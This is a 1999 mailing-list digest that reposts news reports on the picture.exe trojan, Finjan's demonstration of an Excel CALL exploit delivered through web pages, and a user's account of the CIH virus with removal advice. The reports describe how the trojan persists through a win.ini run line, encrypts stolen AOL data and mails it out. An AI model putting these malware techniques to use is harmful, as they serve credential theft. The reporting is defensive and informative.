-Caveat Lector- Trojan horse steals AOL passwords, URLs ---------------------------------------- By Paul Festa, January 7, 1999 Staff Writer, CNET News.com A new email attachment making its way around the spam circuit is swiping recipients' user names and passwords and sending them to a Chinese email address. Full story: http://www.news.com/News/Item/0%2C4%2C30653%2C00.html?dd.ne.tx.ts3.0107 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ story #2 of 4: from: http://www.msnbc.com/news/229572.asp Picture.exe really a Trojan horse E-mail attachment, if opened, tries to send private information to an e-mail address originating in China ------------------------------------------------------ By Bob Sullivan, MSNBC Jan. 6 -- Here's a computer virus story that's not an urban legend. If you receive an attachment in e-mail called "picture.exe," don't open it. If you do, what happens next reads a bit like a spy novel -- this Trojan horse drops two more programs called note.exe and manager.exe which will search through your internet cache directory and, if you have one, the directory that holds your America Online username and password. It then encrypts that information, tries to establish an Internet connection, and sends it all to an e-mail address in China. PICTURE.EXE FIRST SURFACED right before Christmas, when some Net users were spammed with e-mail with the subject line "batty." Several postings to Usenet virus groups followed; then Network Associates engineeers received several e-mail alerts to what appeared to be technically not a virus but a Trojan horse. (A Trojan horse does not replicate on its own, but a virus does.) Network Associates has since updated its McAfee virus program to detect picture.exe (If you already have the software, an updated version can be downloaded from http://beta.nai.com/public/datafiles/3xupdates.htm ), but many questions remain about the prying program. "This is a more interesting Trojan than normal," said Vincent Gullotto, manager of the antivirus emergency response team for Network Associates. "It actually has the capability to take information and send it someplace. This one goes further than most and if it's successful can use the information against you." Network Associates received an unusually large number of e-mails from victims of picture.exe, and there are already dozens of Usenet posts with security experts warning about the danger. Here's how it works: Once a recipient opens picture.exe, that file expands into two other executables -- note.exe and manager.exe -- and places them into the Windows subdirectory. The following line is also added to the win.ini file: "run=note.exe." That makes note.exe run the next time Windows is started. According to Network Associates, note.exe then gathers information, apparently looking through the temporary Internet cache directory in an attempt to determine what Web sites users have visited. It then encrypts that information into a DAT file. It also appear to look in the directory where AOL user information is stored. Note.exe then builds a second DAT file. "It's unclear right now what the second DAT file is for," Gulotto said. Usenet poster David Crick, a British computer science student who received the e-mail Dec. 23 and started the Usenet discussions, said, "I thought when I started downloading a very large e-mail: `Either someone's sent me an interesting piece of software, or it's a virus.' It turned out to be a combination of the two -- an interesting virus," he said. Crick says the file employs a crude encryption technique, a 5-digit ASCII character shift -- where a=f, b=g, and so on. Other Usenet posters say the DAT file is full of e-mail addresses. After note.exe does its thing, manager.exe runs, attempting to e-mail the encrypted file to a e-mail addresses with the domain of a Chinese ISP. The recipient, of course, could be anywhere. "It appears to try to gain access to an ISP," Gulloto said. Several Usenet posts say that upon reboot, the Trojan horse opens up dial-up networking and tries to dial out of the infected PC. There are many unanswered questions -- chief among them, why China? Gulotto said last year his firm worked on a similar Trojan horse/virus with the same M/O. Called SemiSoft, it also gathers information and tries to send it to an e-mail address hosted in China. Network Associates is continuing to study picture.exe. America Online was not available for comment. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ story #3 of 4: Hole lets sites control your computer Security firm demonstrates active content hack ----------------------------------------------- By Bob Sullivan MSNBC -- Jan. 5 -- There's another reason to be careful where you click. Computer security firm Finjan Inc. demonstrated Tuesday morning another process that allows Web sites to reach through the Internet and take control of your PC without your knowledge. A combination of features in Microsoft Excel and most popular Web browsers allows nefarious Web site authors to secretly send and execute programs on unsuspecting users' machines. To demonstrate this, the company copied Word documents from reporters' hard drives and posted them on Finjan's public Web site. In Tuesday's demonstration for reporters, Finjan's Web page placed a folder on reporters' hard drives called "You_have_been _hacked." JIM ELLIS, VULNERABILITY ANALYST at the Computer Emergency Response Team Coordination Center, said the security hole was serious but was another of a class of security problems that have been demonstrated ever since active content like Java and ActiveX became part of the Internet. (Microsoft is a partner in MSNBC.) "What you have done is you say it's OK for whoever wrote this Web page to run content on my machine, and what this content can do is anything," Ellis said. "Anything" includes copying all files from a directory, destroying all files, even reformatting your hard drive -- essentially anything a Visual Basic programmer can do. "The fact that it's running content at all is across the line. It all boils down to all those things are possible once you let someone run code on your machine," Ellis said. Finjan's demonstration, which the company dubbed the Russian New Year attack, took advantage of an already-disclosed flaw in Microsoft Excel (see MSNBC's Dec. 11 Bug Alert). http://www.msnbc.com/news/222906.asp Excel's CALL function, which allows initiation of Windows .dll programs, can be used to trigger bad code without a user's knowledge. Microsoft issued a patch for that in early December. Finjan security experts Tuesday demonstrated an implementation of the Excel CALL function on a Web page. An unsuspecting surfer would click on a Web link, which would launch Excel, which would then employ the CALL function to transmit a batch file that executed code on a user's machine. In Tuesday's demonstration for reporters, Finjan's Web page placed a folder on reporters' hard drives called "You_have_been_hacked" and put Word files copied from reporters' computers onto the company's Web site. All of Microsoft's Internet Explorer browser versions 3.x and 4.x as well as Netscape browser versions 3.x and 4.x (except Navigator 4.5) are vulnerable when used with Excel 95 or 97, according to Finjan. Both Navigator and Explorer are capable of auto-launching an application like Microsoft Excel using standard HTML tags. There are several defensive measures users can take. Users can install Microsoft's patch from http://officeupdate.microsoft.com/downloadDetails/xl97cfp.htm CERT's Ellis says Excel users can disable macros -- that will prevent the CALL function from working. Finjan also suggests Netscape Navigator 4.0 users upgrade to 4.5, and that Internet Explorer users adjust the security setting on the browser to the highest level. Microsoft Office group product manager John Duncan said his company has moved quickly to fix the bug which allows the Russian New Year attack, saying Microsoft has sent over 1 million e-mails warning customers about the hazards of the CALL function. The company also says it has software that can detect and block the hack. "Our No. 1 goal is to inform and protect customers, and that's why within a week we moved to create the fix and communicated it through every channel we could," Duncan said. "This is not a new issue, it's the one we covered in December." CERT officials say these kinds of hacks will continue to be exploited until there's an infrastructure change in the Internet itself that changes the nature of active content. "We want to be able to allow people to run active content, but only when it's their choice," Ellis said. "You know where the program is coming from and know the type of things a program is able to do." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ story #4 of 4: From: Tom Addison <[EMAIL PROTECTED]> Date: Mon, 28 Dec 1998 Subj: Virus Win95/CIH ~~~~~~~~~~~~~~~~ I know this may not belong here but any help would be appreciated. During the holidays I received a very nice file called tree.exe. You clicked on angels and decorated a tree. I had two anti virus programmes running and neither detected it. The friend who sent it had Norton and had the virus eat and delete their Norton then lock up and crash their hard disc. I have since downloaded McAfee only to find that the virus forces deletion of your McAfee exe files before they can complete their work. In hopes of using one anti virus to clean the other I downloaded Norton early this morning. After downloading 12+ MBs Norton began to open only to be deleted by McAffee anti virus because the file is already infected. Poof 12 MB gone. If you have this file from someone get rid of it (although the bad news is the damage is done). If anyone has had some success please pass it along. Tom one solution: Norton AntiVirus KILL_CIH.EXE Tool, see: http://www.symantec.com/avcenter/kill_cih.html You can obtain a freeware version of Norton AntiVirus to detect and remove the virus from files on the Symantec web site at: http://www.symantec.com/nav/navc.html NOTE: If you are already infected with the W95.CIH virus, run the KILL_CIH tool first before attempting to update your anti-virus definitions or scan your system. If you attempt to scan with an anti-virus product without first running this tool, you run the risk of causing your infection to spread. Once you have used this tool, you can safely update your Norton AntiVirus definitions and scan your machine. Download the KILL_CIH tool: ftp://ftp.symantec.com/public/english_us_canada/ antivirus_definitions/norton_antivirus/kill_cih.exe . DECLARATION & DISCLAIMER ========== CTRL is a discussion and informational exchange list. Proselyzting propagandic screeds are not allowed. Substance—not soapboxing! These are sordid matters and 'conspiracy theory', with its many half-truths, misdirections and outright frauds is used politically by different groups with major and minor effects spread throughout the spectrum of time and thought. That being said, CTRL gives no endorsement to the validity of posts, and always suggests to readers; be wary of what you read. CTRL gives no credeence to Holocaust denial and nazi's need not apply. Let us please be civil and as always, Caveat Lector. ======================================================================== Archives Available at: http://home.ease.lsoft.com/archives/CTRL.html http:[EMAIL PROTECTED]/ ======================================================================== To subscribe to Conspiracy Theory Research List[CTRL] send email: SUBSCRIBE CTRL [to:] [EMAIL PROTECTED] To UNsubscribe to Conspiracy Theory Research List[CTRL] send email: SIGNOFF CTRL [to:] [EMAIL PROTECTED] Om